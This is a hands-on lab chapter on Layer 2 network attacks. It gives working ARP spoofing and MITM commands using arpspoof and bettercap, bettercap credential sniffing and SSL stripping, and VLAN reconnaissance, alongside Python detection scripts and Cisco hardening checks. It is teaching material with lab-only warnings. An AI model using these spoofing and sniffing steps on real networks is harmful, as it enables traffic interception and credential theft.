Part III: Hands-On Labs Chapter 2

Layer 2 Attack Labs

MAC flooding, ARP spoofing, VLAN hopping, and switch security hands-on exercises

Lab Overview

These labs demonstrate Layer 2 attacks in a controlled environment. Only perform these exercises on networks you own or have explicit authorization to test.


Lab 2.1: ARP Cache Inspection

Objective

Understand normal ARP behavior before attacking it.

Difficulty: Beginner | Time: 20 minutes

Instructions

Part 1: View ARP Cache

# Linux
arp -a
ip neigh show

# Windows
arp -a

# macOS
arp -a

Part 2: Watch ARP Traffic

# Clear cache
sudo ip neigh flush all

# Start Wireshark filter: arp

# Ping gateway
ping -c 1 192.168.1.1

# Observe:
# 1. ARP Request broadcast
# 2. ARP Reply from gateway
# 3. Entry added to cache

Part 3: ARP Cache Analysis

# Check gateway entry
ip neigh show | grep 192.168.1.1

# Note: MAC address, state (REACHABLE, STALE)

# Watch entry age
watch -n 1 'ip neigh show'

Verification

  • Viewed ARP cache on your system
  • Captured ARP request/reply pair
  • Identified gateway MAC address
  • Observed cache entry states

Lab 2.2: ARP Spoofing Attack

Objective

Perform ARP spoofing to achieve MITM position.

Difficulty: Advanced | Time: 45 minutes

Environment

Lab Setup:
├── Attacker: Kali (192.168.1.50)
├── Victim: Ubuntu (192.168.1.100)
├── Gateway: Router (192.168.1.1)
└── Network: Isolated VLAN

Warning

Only perform on YOUR isolated lab network. Never on production networks.

Instructions

Part 1: Enable IP Forwarding

# On Attacker (needs root). "sudo echo 1 > /proc/sys/..." fails because the
# redirect runs as the unprivileged user, so set it through sysctl instead:
sudo sysctl -w net.ipv4.ip_forward=1

# Verify
cat /proc/sys/net/ipv4/ip_forward
# Should return: 1

Part 2: ARP Spoofing with arpspoof

# Terminal 1: Spoof gateway to victim
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

# Terminal 2: Spoof victim to gateway
sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

# Keep both running

Part 3: Verify MITM Position

# On Victim: Check ARP cache
arp -a | grep 192.168.1.1
# Should show ATTACKER's MAC for gateway!

# On Attacker: Capture victim's traffic
sudo tcpdump -i eth0 host 192.168.1.100 -nn

Part 4: Traffic Observation

# On Attacker: Watch HTTP traffic
sudo tcpdump -i eth0 -A host 192.168.1.100 and tcp port 80

# On Victim: Browse to HTTP site
curl http://httpbin.org/post -d "password=secret123"

# On Attacker: Should see cleartext POST data

Blue Team Perspective

# Detection on victim:
# Watch for gateway MAC changes
watch -n 1 'arp -a | grep 192.168.1.1'

# Use arpwatch
sudo arpwatch -i eth0

# Static ARP entry (defense)
sudo arp -s 192.168.1.1 <real_gateway_mac>
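As an added example (not part of the lab), the arpwatch check above implemented in Python over raw ARP frames: it learns the IP-to-MAC mapping from each frame and alerts when an IP's MAC changes, which is exactly what the spoofed gateway reply from Part 2 looks like on the victim. The MACs and frames are constructed to match the lab topology, not captured traffic.

```python
import struct

ETH_P_ARP, ARP_REPLY = 0x0806, 2

def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)

def parse_arp(frame):
    """Return (eth_src, sender_mac, sender_ip, opcode) for an IPv4/Ethernet ARP frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return frame[6:12], frame[22:28], frame[28:32], opcode

def monitor(frames, cache=None):
    """arpwatch-style check: learn IP->MAC from every ARP frame, alert when an IP flips to a
    new MAC (what a spoofed gateway looks like) or the ARP sender MAC != Ethernet source."""
    cache = {} if cache is None else cache
    alerts = []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        eth_src, smac, sip, _opcode = parsed
        ip, mac = ip_str(sip), mac_str(smac)
        if eth_src != smac:
            alerts.append(f"{ip}: ARP sender {mac} != frame source {mac_str(eth_src)}")
        old = cache.get(ip)
        if old is not None and old != mac:
            alerts.append(f"{ip}: MAC changed {old} -> {mac} (possible ARP spoof)")
        cache[ip] = mac
    return alerts

def build_arp_reply(src_mac, sender_ip, target_mac, target_ip):
    """Constructed ARP reply for offline testing; Ethernet source == ARP sender MAC."""
    eth = struct.pack("!6s6sH", target_mac, src_mac, ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY) + src_mac + sender_ip + target_mac + target_ip
    return eth + arp + bytes(18)  # pad to the 60-byte minimum frame size

# Constructed MACs/IPs matching the lab topology (assumed values, not captured traffic).
GATEWAY_MAC, VICTIM_MAC, ATTACKER_MAC = (bytes.fromhex(h) for h in ("001122aabb01", "001122aabb64", "001122aabb32"))
GATEWAY_IP, VICTIM_IP = bytes([192, 168, 1, 1]), bytes([192, 168, 1, 100])

def demo():
    """Genuine gateway reply, then the spoofed one 'arpspoof -t 192.168.1.100 192.168.1.1' would send."""
    genuine = build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    spoofed = build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    return monitor([genuine, spoofed])
```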

Cleanup

# Stop arpspoof (Ctrl+C)
# ARP tables will self-correct

# Or manually restore on victim:
sudo ip neigh flush all

Verification

  • Achieved MITM position
  • Verified with ARP cache check
  • Captured victim traffic
  • Successfully cleaned up

Lab 2.3: ARP Spoofing with Bettercap

Objective

Use a modern tool for ARP spoofing with additional capabilities.

Difficulty: Advanced | Time: 30 minutes

Instructions

Part 1: Basic ARP Spoof

# Start bettercap
sudo bettercap -iface eth0

# Enable net probe to discover hosts
» net.probe on

# Wait for hosts to be discovered
» net.show

# Target specific host
» set arp.spoof.targets 192.168.1.100
» set arp.spoof.fullduplex true
» arp.spoof on

# Enable sniffing
» net.sniff on

Part 2: Credential Sniffing

# Bettercap auto-detects credentials
# Watch output for captured passwords

# On victim, try HTTP login
# Bettercap displays: [http.post] username=admin&password=secret

Part 3: SSL Strip (Educational)

# NOTE: Modern HSTS defeats this
# Educational demonstration only

» set http.proxy.sslstrip true
» http.proxy on

# Downgrades HTTPS to HTTP where possible
# HSTS-protected sites will fail (expected)

Verification

  • Discovered hosts with net.probe
  • Achieved ARP spoof
  • Captured HTTP credentials
  • Observed SSL strip behavior

Lab 2.4: MAC Flooding (Conceptual)

Objective

Understand MAC flooding concepts and detection.

Difficulty: Intermediate | Time: 20 minutes

Note

Actual MAC flooding can crash switches. This lab focuses on understanding and detection rather than execution.

Instructions

Part 1: Understand the Attack

MAC Flooding Goal:
- Fill switch CAM table
- Switch reverts to hub behavior
- All traffic visible to attacker

Modern switches:
- Port security prevents this
- Most limit MACs per port

Part 2: Detection Exercise

# Generate pcap with MAC flood traffic (simulated)
# Or use sample capture from lab files

# In Wireshark, filter:
eth.src != <your_mac> and eth.dst != <your_mac>

# Signs of MAC flood:
# - Many source MACs from single port
# - Random/sequential MAC addresses
# - High broadcast traffic
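The three indicators above, scored over a constructed capture (an added example, not lab material): a sliding window counts distinct source MACs, consecutive frames are checked for sequential addresses, and unicast frames not addressed to the monitoring host are counted, which is what the Wireshark filter above surfaces once the switch starts flooding. The MAC addresses and timestamps are made up for the demonstration.

```python
from collections import deque

def is_multicast(mac): return bool(mac[0] & 1)    # I/G bit set: broadcast or multicast

def analyze(frames, my_mac, window=1.0, mac_threshold=50):
    """Score a capture for the MAC flood indicators listed in Part 2.
    frames: (timestamp_s, src_mac, dst_mac) triples in capture order, MACs as 6-byte values.
    A sliding window counts distinct source MACs per `window` seconds; the other two
    indicators are sequential source addresses and unicast frames not addressed to us."""
    recent, in_window, prev = deque(), {}, None          # frames in window, src -> count
    stats = {"max_distinct": 0, "sequential_pairs": 0, "foreign_unicast": 0, "alerts": []}
    for ts, src, dst in frames:
        recent.append((ts, src))
        in_window[src] = in_window.get(src, 0) + 1
        while ts - recent[0][0] > window:                  # expire frames older than the window
            _, old = recent.popleft()
            in_window[old] -= 1
            if in_window[old] == 0:
                del in_window[old]
        if len(in_window) > stats["max_distinct"]:
            stats["max_distinct"] = len(in_window)
            if len(in_window) == mac_threshold + 1:        # report the crossing once
                stats["alerts"].append(f"t={ts:.3f}s: over {mac_threshold} source MACs "
                                       f"within {window}s (CAM table overflow?)")
        if prev is not None and int.from_bytes(src, "big") - int.from_bytes(prev, "big") == 1:
            stats["sequential_pairs"] += 1                 # generator-style sequential MACs
        prev = src
        if dst != my_mac and not is_multicast(dst):
            stats["foreign_unicast"] += 1                  # someone else's unicast reached our port: switch is flooding
    return stats

MY_MAC = bytes.fromhex("001122aabb64")   # constructed value for the monitoring host

def make_sample():
    """Constructed capture (not lab data): 2 s of normal traffic from three hosts,
    then a 200-frame burst with sequential source MACs within 0.2 s."""
    hosts = [bytes.fromhex(h) for h in ("001122aabb01", "001122aabb17", "001122aabb3c")]
    frames = [(0.1 * i, hosts[i % 3], MY_MAC) for i in range(20)]
    base = int.from_bytes(bytes.fromhex("02a000000000"), "big")
    other = bytes.fromhex("02b000000000")                  # unicast destination that is not us
    frames += [(2.0 + 0.001 * i, (base + i).to_bytes(6, "big"), other) for i in range(200)]
    return frames

def demo():
    return analyze(make_sample(), MY_MAC)
```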

Part 3: Switch Security (If Access)

! Cisco IOS - View MAC table
show mac address-table count

! Configure port security (the interface must be a static access port;
! IOS rejects port-security on a port still in dynamic/trunk mode)
interface GigabitEthernet0/1
  switchport mode access
  switchport port-security
  switchport port-security maximum 3
  switchport port-security violation restrict

Verification

  • Understand CAM table overflow concept
  • Know detection indicators
  • Understand port security countermeasure

Lab 2.5: VLAN Enumeration

Objective

Discover VLAN information from network traffic.

Difficulty: Intermediate | Time: 30 minutes

Instructions

Part 1: CDP/LLDP Discovery

# Capture discovery protocols. LLDP has EtherType 0x88cc; CDP is LLC/SNAP
# encapsulated (no EtherType), so match its destination MAC plus the SNAP
# protocol ID 0x2000 at byte offset 20 instead of "ether proto 0x2000".
sudo tcpdump -i eth0 -nn -v 'ether[12:2] == 0x88cc or (ether dst 01:00:0c:cc:cc:cc and ether[20:2] == 0x2000)'

# Or in Wireshark
# Filter: cdp or lldp

# CDP/LLDP reveal:
# - Switch name
# - Native VLAN
# - Management VLAN
# - Port information

Part 2: Analyze CDP Frame

CDP Frame Contents (example):
- Device ID: switch01
- Platform: Cisco Catalyst 3750
- Native VLAN: 1
- Port ID: GigabitEthernet0/1
- Management Address: 192.168.1.1
- VTP Management Domain: CORP
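An added example (not from the lab files): a parser for the CDP TLV format that extracts the fields listed above from a CDP payload, with every TLV length checked against the buffer so a malformed frame raises instead of being trusted. The sample payload is constructed to carry the example values; the TLV type numbers are CDP's own.

```python
import struct
import ipaddress

STRING_TLVS = {0x0001: "device_id", 0x0003: "port_id", 0x0006: "platform", 0x0009: "vtp_domain"}
TLV_ADDRESSES, TLV_NATIVE_VLAN, TLV_MGMT_ADDRESS = 0x0002, 0x000A, 0x0016
NLPID_IP = 0xCC    # protocol value marking an IPv4 address inside an address TLV

def parse_address_tlv(value):
    """Address TLV body: 4-byte count, then (proto type, proto len, proto, 2-byte addr len, addr) per entry."""
    count, pos, addrs = struct.unpack("!I", value[:4])[0], 4, []
    for _ in range(count):
        ptype, plen = value[pos], value[pos + 1]
        proto = value[pos + 2:pos + 2 + plen]
        alen = struct.unpack("!H", value[pos + 2 + plen:pos + 4 + plen])[0]
        addr = value[pos + 4 + plen:pos + 4 + plen + alen]
        if len(addr) != alen:
            raise ValueError("truncated address entry")
        if ptype == 1 and proto == bytes([NLPID_IP]) and alen == 4:   # NLPID-encoded IPv4
            addrs.append(str(ipaddress.IPv4Address(addr)))
        pos += 4 + plen + alen
    return addrs

def parse_cdp(payload):
    """Parse a CDP payload (the bytes after the LLC/SNAP header) into a dict of the Part 2 fields.
    TLV lengths are checked against the buffer (a truncated header decodes as length 0); the checksum is not verified."""
    info, pos = {"version": payload[0], "ttl": payload[1]}, 4
    while pos < len(payload):
        ttype, tlen = struct.unpack("!HH", payload[pos:pos + 4]) if pos + 4 <= len(payload) else (0, 0)
        if tlen < 4 or pos + tlen > len(payload):
            raise ValueError(f"bad TLV length {tlen} at offset {pos}")
        value = payload[pos + 4:pos + tlen]
        if ttype in STRING_TLVS:
            info[STRING_TLVS[ttype]] = value.decode("ascii", "replace")
        elif ttype == TLV_NATIVE_VLAN and len(value) == 2:
            info["native_vlan"] = struct.unpack("!H", value)[0]
        elif ttype in (TLV_ADDRESSES, TLV_MGMT_ADDRESS):
            key = "mgmt_addresses" if ttype == TLV_MGMT_ADDRESS else "addresses"
            info[key] = parse_address_tlv(value)
        pos += tlen
    return info

def tlv(ttype, value):
    return struct.pack("!HH", ttype, len(value) + 4) + value   # length covers the 4-byte header

def sample_cdp():
    """Constructed CDP payload (not a capture) carrying the example values from Part 2."""
    ip = struct.pack("!I", 1) + bytes([1, 1, NLPID_IP]) + struct.pack("!H", 4) + ipaddress.IPv4Address("192.168.1.1").packed
    return bytes([2, 180, 0, 0]) + b"".join([          # version 2, TTL 180 s, checksum left zero
        tlv(0x0001, b"switch01"), tlv(0x0006, b"Cisco Catalyst 3750"), tlv(0x0003, b"GigabitEthernet0/1"),
        tlv(TLV_NATIVE_VLAN, struct.pack("!H", 1)), tlv(TLV_MGMT_ADDRESS, ip), tlv(0x0009, b"CORP")])
```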

Part 3: DTP Analysis

# DTP used for trunk negotiation
# Wireshark filter: dtp

# DTP reveals trunk status; a port left in dynamic mode can be negotiated into a trunk (switch spoofing)
# Defense: "switchport nonegotiate" on all ports

Verification

  • Captured CDP or LLDP frames
  • Extracted VLAN information
  • Identified potential trunk ports

Lab 2.6: Switch Security Verification

Objective

Verify switch security controls are effective.

Difficulty: Beginner | Time: 30 minutes

Instructions

Part 1: Port Security Check

# From management access
show port-security interface Gi0/1
show port-security address

# Expected if secured:
# - Maximum MAC addresses set
# - Violation action configured
# - Current MAC addresses listed

Part 2: DAI Verification

show ip arp inspection

# Check if enabled on VLANs
# Check trusted vs untrusted ports

Part 3: DHCP Snooping

show ip dhcp snooping
show ip dhcp snooping binding

# Verify binding table populated
# Check trusted ports

Security Checklist

Layer 2 Security Verification:
□ Port security enabled on access ports
□ Port security violation action: restrict or shutdown
□ MAC address limit appropriate (1-3 for user ports)
□ DAI enabled on VLANs
□ DHCP snooping enabled
□ DHCP snooping trusted ports correct
□ DTP disabled (nonegotiate)
□ Native VLAN changed from default
□ BPDU Guard on access ports
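An added example (not part of the lab) that checks the three port-security items of the checklist against "show port-security interface" output from Part 1; the two outputs below are constructed in the shape IOS prints, not captured from a switch.

```python
SECURED_OUTPUT = """\
Port Security              : Enabled
Port Status                : Secure-up
Violation Mode             : Restrict
Aging Time                 : 0 mins
Maximum MAC Addresses      : 3
Total MAC Addresses        : 1
Last Source Address:Vlan   : 0011.22aa.bb64:10
Security Violation Count   : 0
"""

# "protect" drops offending frames silently, with no log message or counter, so the
# checklist treats it as a failure; the limit of 50 would let a flood through as well.
WEAK_OUTPUT = """\
Port Security              : Enabled
Port Status                : Secure-up
Violation Mode             : Protect
Maximum MAC Addresses      : 50
Total MAC Addresses        : 12
Security Violation Count   : 0
"""

def parse_show(output):
    """Turn the 'Key : Value' lines of 'show port-security interface' into a dict."""
    fields = {}
    for line in output.splitlines():
        if " : " in line:
            key, value = line.split(" : ", 1)
            fields[key.strip()] = value.strip()
    return fields

def check_port_security(fields, max_allowed=3):
    """Evaluate the first three checklist items. Returns (check, passed, observed) tuples."""
    state = fields.get("Port Security", "missing")
    mode = fields.get("Violation Mode", "missing").lower()
    try:
        maximum = int(fields.get("Maximum MAC Addresses", ""))
    except ValueError:
        maximum = 0                   # field absent: treat as failing, never as "fine"
    return [
        ("Port security enabled on access port", state == "Enabled", state),
        ("Violation action restrict or shutdown", mode in ("restrict", "shutdown"), mode),
        (f"MAC address limit 1-{max_allowed}", 1 <= maximum <= max_allowed, str(maximum)),
    ]

def failing(output):
    """Names of the checklist items the given output fails."""
    return [name for name, ok, _ in check_port_security(parse_show(output)) if not ok]
```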

Lab Summary

Skills Acquired

  • ARP cache analysis
  • ARP spoofing techniques
  • MITM positioning
  • Traffic interception
  • VLAN enumeration
  • Switch security verification

Key Learnings

  1. ARP has no authentication - anyone can claim any IP
  2. MITM enables powerful attacks - credential theft, injection
  3. Switch security features exist - they must be enabled
  4. Defense requires multiple layers - DAI, port security, segmentation

What You Learned (Defense)

For each attack, document the defense:

Attack       Detection             Prevention
ARP Spoof    arpwatch, DAI logs    DAI, static ARP
MAC Flood    CAM table alerts      Port security
VLAN Hop     Monitor for DTP       Disable DTP